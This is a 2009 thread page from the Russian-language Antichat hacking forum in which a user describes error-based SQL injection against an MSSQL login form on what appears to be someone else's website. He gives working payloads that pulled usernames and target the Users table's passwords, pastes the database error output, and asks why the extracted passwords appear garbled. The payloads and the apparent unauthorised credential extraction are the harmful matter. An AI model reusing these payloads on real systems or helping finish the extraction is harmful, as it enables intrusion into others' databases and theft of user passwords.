ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу mssql injection
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

mssql injection
  #1  
Старый 01.08.2009, 00:25
Аватар для Moerto
Moerto
Новичок
Регистрация: 22.07.2009
Сообщений: 7
Провел на форуме:
19852

Репутация: 0
По умолчанию mssql injection
Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди:
Код:
' and 1=convert(int, (select top 1...))--
Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ .
Код:
' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))--
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int.
Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо.
P.S. Я неоченъ харашо гаварю по руски, извиньице.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
mssql injection pop_korn Video.Antichat 0 07.02.2007 14:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ